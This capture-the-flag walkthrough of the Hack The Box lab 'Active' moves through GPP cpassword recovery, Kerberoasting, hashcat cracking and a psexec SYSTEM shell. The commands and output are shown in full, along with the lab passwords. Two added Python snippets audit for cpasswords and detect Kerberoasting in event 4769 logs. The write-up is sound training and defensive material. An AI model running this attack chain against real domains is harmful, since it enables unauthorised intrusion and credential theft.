Active
Active is an easy Active Directory machine. It is listed as OSCP-like [TJ Null, Lainkusanagi] and CPTS-like [ippsec, 0xdf].
First, I start with port scanning.
rustscan -a 10.129.112.146
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
Open 10.129.112.146:53
Open 10.129.112.146:88
Open 10.129.112.146:135
Open 10.129.112.146:139
Open 10.129.112.146:389
Open 10.129.112.146:445
Open 10.129.112.146:464
Open 10.129.112.146:593
Open 10.129.112.146:636
Open 10.129.112.146:3268
Open 10.129.112.146:3269
Open 10.129.112.146:5722
Open 10.129.112.146:9389
Open 10.129.112.146:47001
Open 10.129.112.146:49152
Open 10.129.112.146:49153
Open 10.129.112.146:49157
Open 10.129.112.146:49155
Open 10.129.112.146:49158
Open 10.129.112.146:49162
Open 10.129.112.146:49154
Open 10.129.112.146:49169
Open 10.129.112.146:49166
Enum Shares
First, I start the enumeration with null authentication, which this DC allows. From the output we can see the domain name and the hostname, so I add them to the hosts file for the upcoming DNS mapping.
nxc smb 10.129.112.146 -u '' -p ''
SMB 10.129.112.146 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.112.146 445 DC [+] active.htb\:
echo "10.129.112.146 active.htb dc.active.htb" | sudo tee -a /etc/hosts > /dev/null
One share is readable, so we look at its files. I will use the netexec module spider_plus to list its directories and files.
nxc smb 10.129.112.146 -u '' -p '' --shares
SMB 10.129.112.146 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.112.146 445 DC [+] active.htb\:
SMB 10.129.112.146 445 DC [*] Enumerated shares
SMB 10.129.112.146 445 DC Share Permissions Remark
SMB 10.129.112.146 445 DC ----- ----------- ------
SMB 10.129.112.146 445 DC ADMIN$ Remote Admin
SMB 10.129.112.146 445 DC C$ Default share
SMB 10.129.112.146 445 DC IPC$ Remote IPC
SMB 10.129.112.146 445 DC NETLOGON Logon server share
SMB 10.129.112.146 445 DC Replication READ
SMB 10.129.112.146 445 DC SYSVOL Logon server share
SMB 10.129.112.146 445 DC Users
nxc smb 10.129.112.146 -u '' -p '' -M spider_plus
SMB 10.129.112.146 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.112.146 445 DC [+] active.htb\:
SPIDER_PLUS 10.129.112.146 445 DC [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.129.112.146 445 DC [*] DOWNLOAD_FLAG: False
SPIDER_PLUS 10.129.112.146 445 DC [*] STATS_FLAG: True
SPIDER_PLUS 10.129.112.146 445 DC [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.129.112.146 445 DC [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.129.112.146 445 DC [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.129.112.146 445 DC [*] OUTPUT_FOLDER: /home/legend/.nxc/modules/nxc_spider_plus
<snip>
SPIDER_PLUS 10.129.112.146 445 DC [+] Saved share-file metadata to "/home/legend/.nxc/modules/nxc_spider_plus/10.129.112.146.json".
SPIDER_PLUS 10.129.112.146 445 DC [*] SMB Shares: 7 (ADMIN$, C$, IPC$, NETLOGON, Replication, SYSVOL, Users)
SPIDER_PLUS 10.129.112.146 445 DC [*] SMB Readable Shares: 1 (Replication)
SPIDER_PLUS 10.129.112.146 445 DC [*] Total folders found: 22
SPIDER_PLUS 10.129.112.146 445 DC [*] Total files found: 7
SPIDER_PLUS 10.129.112.146 445 DC [*] File size average: 1.16 KB
SPIDER_PLUS 10.129.112.146 445 DC [*] File size min: 22 B
SPIDER_PLUS 10.129.112.146 445 DC [*] File size max: 3.63 KB
Now I will copy the JSON file that the spider_plus module produced and pretty-print it in the terminal with jq.
cp /home/legend/.nxc/modules/nxc_spider_plus/10.129.112.146.json .
cat 10.129.112.146.json | jq .
{
"Replication": {
"active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI": {
"atime_epoch": "2018-07-21 06:37:44",
"ctime_epoch": "2018-07-21 06:37:44",
"mtime_epoch": "2018-07-21 06:38:11",
"size": "23 B"
},
"active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI": {
"atime_epoch": "2018-07-21 06:37:44",
"ctime_epoch": "2018-07-21 06:37:44",
"mtime_epoch": "2018-07-21 06:38:11",
"size": "119 B"
},
"active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
"atime_epoch": "2018-07-21 06:37:44",
"ctime_epoch": "2018-07-21 06:37:44",
"mtime_epoch": "2018-07-21 06:38:11",
"size": "1.07 KB"
},
"active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml": {
"atime_epoch": "2018-07-21 06:37:44",
"ctime_epoch": "2018-07-21 06:37:44",
"mtime_epoch": "2018-07-21 06:38:11",
"size": "533 B"
},
"active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol": {
"atime_epoch": "2018-07-21 06:37:44",
"ctime_epoch": "2018-07-21 06:37:44",
"mtime_epoch": "2018-07-21 06:38:11",
"size": "2.72 KB"
},
"active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI": {
"atime_epoch": "2018-07-21 06:37:44",
"ctime_epoch": "2018-07-21 06:37:44",
"mtime_epoch": "2018-07-21 06:38:11",
"size": "22 B"
},
"active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
"atime_epoch": "2018-07-21 06:37:44",
"ctime_epoch": "2018-07-21 06:37:44",
"mtime_epoch": "2018-07-21 06:38:11",
"size": "3.63 KB"
}
}
}
Group Policy Preferences is a Windows feature that lets administrators manage settings for multiple machines across an Active Directory (AD) domain. With GPP, admins can control things like mapped drives, scheduled tasks, and registry settings. At one point, GPP also allowed passwords to be set for local accounts, but this practice was insecure as it allowed storing of passwords in an easily reversible format. Microsoft eventually removed that capability. [https://www.semperis.com/blog/group-policy-preferences-abuse-explained]
Out of those files, the most interesting is Groups.xml, which may contain a password.
nxc smb 10.129.112.146 -u '' -p '' --share Replication --get-file "active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml" Groups.xml
SMB 10.129.112.146 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.112.146 445 DC [+] active.htb\:
SMB 10.129.112.146 445 DC [*] Copying "active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml" to "Groups.xml"
SMB 10.129.112.146 445 DC [+] File "active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml" was downloaded to "Groups.xml"
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
Alternatively, we could have used netexec to spider the share and search the file contents for a pattern such as passw.
nxc smb 10.129.112.146 -u '' -p '' --spider Replication --content --pattern "passw"
SMB 10.129.112.146 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.112.146 445 DC [+] active.htb\:
SMB 10.129.112.146 445 DC [*] Spidering .
SMB 10.129.112.146 445 DC //10.129.112.146/Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml [lastm:'2018-07-21 06:38' size:533 offset:533 pattern:'passw']
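The defender-side counterpart of the search above, as an added example that is not part of the original writeup: a small Python audit that walks GPP preference files (Groups.xml, Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml, Printers.xml) and reports every item that still carries a cpassword attribute. The sample XML is constructed to mirror the structure of the file found on the Replication share, with the cpassword value replaced by a placeholder.

```python
import os
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed sample of a GPP Groups.xml (same layout as the one in the
# Replication share); the cpassword value is a placeholder, not the real one.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS"
        changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" cpassword="PLACEHOLDER_BASE64" userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>"""

# GPP preference files that can carry a cpassword attribute (the MS14-025 set).
GPP_FILES = ("Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml")


def find_cpasswords(xml_text: str, source: str = "Groups.xml") -> List[Dict[str, str]]:
    """Return one finding per preference item whose <Properties> has a non-empty cpassword."""
    findings = []
    root = ET.fromstring(xml_text)
    for item in root:                      # <User>, <Group>, <NTService>, <Task>, <Drive>, ...
        props = item.find("Properties")
        cpw = props.get("cpassword") if props is not None else None
        if not cpw:
            continue
        findings.append({
            "file": source,
            "item": item.tag,
            "name": item.get("name", ""),
            "changed": item.get("changed", ""),
            # Different preference types name the affected account differently.
            "account": props.get("userName") or props.get("runAs")
                       or props.get("accountName") or "",
            "action": props.get("action", ""),
        })
    return findings


def audit_sysvol(root_dir: str) -> List[Dict[str, str]]:
    """Scan a local copy of SYSVOL (or the Replication share) for lingering cpasswords."""
    results = []
    for dirpath, _, filenames in os.walk(root_dir):
        for fname in filenames:
            if fname in GPP_FILES:
                path = os.path.join(dirpath, fname)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    results.extend(find_cpasswords(fh.read(), source=path))
    return results
```

Every finding is a GPP item whose password is recoverable by anyone who can read the share; the fix is to delete the preference item and rotate the account's password, since the value stays readable in SYSVOL until the item itself is removed.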
Now we have a cpassword to decrypt, and a quick search for cpassword turns up this tool.
Here I download the tool and install its dependencies.
git clone https://github.com/t0thkr1s/gpp-decrypt.git
cd gpp-decrypt
sudo python3 setup.py install
I passed the whole file, which the tool accepts, and in the blink of an eye it decrypted the cpassword value.
python3 gpp-decrypt.py -f ./groups.xml
__ __
___ _ ___ ___ ____ ___/ / ___ ____ ____ __ __ ___ / /_
/ _ `/ / _ \ / _ \/___// _ / / -_)/ __/ / __/ / // / / _ \/ __/
\_, / / .__/ / .__/ \_,_/ \__/ \__/ /_/ \_, / / .__/\__/
/___/ /_/ /_/ /___/ /_/
[ * ] Username: active.htb\SVC_TGS
[ * ] Password: GPPstillStandingStrong2k18
The Users share is readable by SVC_TGS, but since enumerating it could take time, I will go after the low-hanging fruit first and come back to it.
nxc smb 10.129.112.146 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --shares
SMB 10.129.112.146 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.112.146 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SMB 10.129.112.146 445 DC [*] Enumerated shares
SMB 10.129.112.146 445 DC Share Permissions Remark
SMB 10.129.112.146 445 DC ----- ----------- ------
SMB 10.129.112.146 445 DC ADMIN$ Remote Admin
SMB 10.129.112.146 445 DC C$ Default share
SMB 10.129.112.146 445 DC IPC$ Remote IPC
SMB 10.129.112.146 445 DC NETLOGON READ Logon server share
SMB 10.129.112.146 445 DC Replication READ
SMB 10.129.112.146 445 DC SYSVOL READ Logon server share
SMB 10.129.112.146 445 DC Users READ
Analysing this account, I can't find anything interesting except its name.
nxc ldap 10.129.112.146 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --query "(sAMAccountName=SVC_TGS)" ""
LDAP 10.129.112.146 389 DC [*] Windows 7 / Server 2008 R2 Build 7601 (name:DC) (domain:active.htb) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.112.146 389 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
LDAP 10.129.112.146 389 DC [+] Response for object: CN=SVC_TGS,CN=Users,DC=active,DC=htb
LDAP 10.129.112.146 389 DC objectClass top
LDAP 10.129.112.146 389 DC person
LDAP 10.129.112.146 389 DC organizationalPerson
LDAP 10.129.112.146 389 DC user
LDAP 10.129.112.146 389 DC cn SVC_TGS
LDAP 10.129.112.146 389 DC distinguishedName CN=SVC_TGS,CN=Users,DC=active,DC=htb
LDAP 10.129.112.146 389 DC instanceType 4
LDAP 10.129.112.146 389 DC whenCreated 20180718201438.0Z
LDAP 10.129.112.146 389 DC whenChanged 20250725214551.0Z
LDAP 10.129.112.146 389 DC displayName SVC_TGS
LDAP 10.129.112.146 389 DC uSNCreated 20508
LDAP 10.129.112.146 389 DC uSNChanged 110721
LDAP 10.129.112.146 389 DC name SVC_TGS
LDAP 10.129.112.146 389 DC objectGUID 35329d8c-0a1d-b14d-99ee-3f783d1a9bd6
LDAP 10.129.112.146 389 DC userAccountControl 66048
LDAP 10.129.112.146 389 DC badPwdCount 0
LDAP 10.129.112.146 389 DC codePage 0
LDAP 10.129.112.146 389 DC countryCode 0
LDAP 10.129.112.146 389 DC badPasswordTime 0
LDAP 10.129.112.146 389 DC lastLogoff 0
LDAP 10.129.112.146 389 DC lastLogon 133979542348967192
LDAP 10.129.112.146 389 DC pwdLastSet 131764184784027640
LDAP 10.129.112.146 389 DC primaryGroupID 513
LDAP 10.129.112.146 389 DC objectSid S-1-5-21-405608879-3187717380-1996298813-1103
LDAP 10.129.112.146 389 DC accountExpires 9223372036854775807
LDAP 10.129.112.146 389 DC logonCount 7
LDAP 10.129.112.146 389 DC sAMAccountName SVC_TGS
LDAP 10.129.112.146 389 DC sAMAccountType 805306368
LDAP 10.129.112.146 389 DC userPrincipalName SVC_TGS@active.htb
LDAP 10.129.112.146 389 DC objectCategory CN=Person,CN=Schema,CN=Configuration,DC=active,DC=htb
LDAP 10.129.112.146 389 DC dSCorePropagationData 20180718201438.0Z
LDAP 10.129.112.146 389 DC 16010101000000.0Z
LDAP 10.129.112.146 389 DC lastLogonTimestamp 133979535515687190
TGS stands for Ticket Granting Service, which is part of Kerberos. So let's see what we can do with it.
Kerberoasting requests TGS tickets for services that run under user accounts in AD (accounts with an SPN), rather than under computer accounts. Part of each such ticket is encrypted with a key derived from the service account's password, so the ticket can be taken offline and the password cracked without further contact with the DC.
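The detection side of the same technique, as an added example that is not part of the original writeup: event 4769 (Kerberos service ticket requested) is logged on the DC for every TGS request, and Kerberoasting stands out as RC4 (TicketEncryptionType 0x17, the etype 23 that hashcat mode 13100 cracks) tickets for user-account SPNs. The records below are constructed key=value flattenings of 4769 events, not real logs from the machine; the requester names and source IPs are assumed.

```python
from collections import Counter
from typing import Dict, List

# Constructed sample of 4769 events, flattened to key=value pairs. Two RC4 requests
# for the Administrator SPN from one client, plus normal AES traffic that must not alert.
SAMPLE_4769 = [
    "TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.10.14.5",
    "TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x12 Status=0x0 IpAddress=::ffff:10.10.14.5",
    "TargetUserName=DC$@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x12 Status=0x0 IpAddress=::ffff:10.129.112.146",
    "TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.10.14.5",
]

RC4_HMAC = "0x17"   # etype 23: the only etype hashcat -m 13100 handles


def parse_4769(line: str) -> Dict[str, str]:
    """Turn one flattened 4769 record into a field dict."""
    return dict(tok.split("=", 1) for tok in line.split())


def is_kerberoast_candidate(ev: Dict[str, str]) -> bool:
    """RC4 service ticket, issued successfully, for a user (not computer) account SPN."""
    svc = ev.get("ServiceName", "")
    return (ev.get("TicketEncryptionType", "").lower() == RC4_HMAC
            and ev.get("Status") == "0x0"
            and not svc.endswith("$")          # computer accounts: long random passwords
            and svc.lower() != "krbtgt")       # TGT-related 4769s are normal noise


def kerberoast_alerts(lines: List[str], threshold: int = 1) -> List[Dict[str, object]]:
    """Group candidate requests by (requester, source IP); alert at or above threshold."""
    counts: Counter = Counter()
    services: Dict[tuple, set] = {}
    for line in lines:
        ev = parse_4769(line)
        if not is_kerberoast_candidate(ev):
            continue
        key = (ev.get("TargetUserName", ""), ev.get("IpAddress", ""))
        counts[key] += 1
        services.setdefault(key, set()).add(ev["ServiceName"])
    return [{"requester": k[0], "source": k[1], "rc4_requests": n,
             "services": sorted(services[k])}
            for k, n in counts.items() if n >= threshold]
```

In an estate that still has legitimate RC4 clients, raise the threshold or alert on the count of distinct services per requester instead; a single client asking for RC4 tickets to every SPN in the domain in a few seconds is the typical Kerberoasting signature.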
nxc ldap 10.129.112.146 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --kerberoasting output.txt
LDAP 10.129.112.146 389 DC [*] Windows 7 / Server 2008 R2 Build 7601 (name:DC) (domain:active.htb) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.112.146 389 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
LDAP 10.129.112.146 389 DC [*] Skipping disabled account: krbtgt
LDAP 10.129.112.146 389 DC [*] Total of records returned 1
LDAP 10.129.112.146 389 DC [*] sAMAccountName: Administrator, memberOf: ['CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb', 'CN=Domain Admins,CN=Users,DC=active,DC=htb', 'CN=Enterprise Admins,CN=Users,DC=active,DC=htb', 'CN=Schema Admins,CN=Users,DC=active,DC=htb', 'CN=Administrators,CN=Builtin,DC=active,DC=htb'], pwdLastSet: 2018-07-18 15:06:40.351723, lastLogon: 2025-07-25 17:21:27.880548
LDAP 10.129.112.146 389 DC $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb\Administrator*$acc026cf097b0a59f8ec375bdf6c64dc$<snip>
Now we have the Administrator's Kerberos TGS-REP hash. Let's check the hashcat mode for it.
I'm using hashcat on the bare OS, which is Windows in my case, to use the GPU for fast cracking.
C:\Users\abdelrazek\Downloads\hashcat-6.2.6>hashcat.exe -m 13100 output.txt rockyou.txt
hashcat (v6.2.6) starting
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb\Administrator*$acc026cf097b0<snip>:Ticketmaster1968
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb\Ad...9afcf5
Time.Started.....: Sat Jul 26 01:00:30 2025 (2 secs)
Time.Estimated...: Sat Jul 26 01:00:32 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 7998.8 kH/s (6.62ms) @ Accel:512 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10813440/14344384 (75.38%)
Rejected.........: 0/10813440 (0.00%)
Restore.Point....: 10321920/14344384 (71.96%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: ahki14 -> Ms.Jordan
Hardware.Mon.#1..: Temp: 55c Fan: 0% Util: 33% Core:1455MHz Mem:6801MHz Bus:16
Started: Sat Jul 26 01:00:28 2025
Stopped: Sat Jul 26 01:00:32 2025
nxc smb 10.129.112.146 -u 'Administrator' -p 'Ticketmaster1968'
SMB 10.129.112.146 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.112.146 445 DC [+] active.htb\Administrator:Ticketmaster1968 (Pwn3d!)
Since WinRM isn't available on this machine, we use psexec to get a shell.
impacket-psexec active.htb/Administrator:Ticketmaster1968@10.129.112.146
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.129.112.146.....
[*] Found writable share ADMIN$
[*] Uploading file VPsIZKda.exe
[*] Opening SVCManager on 10.129.112.146.....
[*] Creating service nzvU on 10.129.112.146.....
[*] Starting service nzvU.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system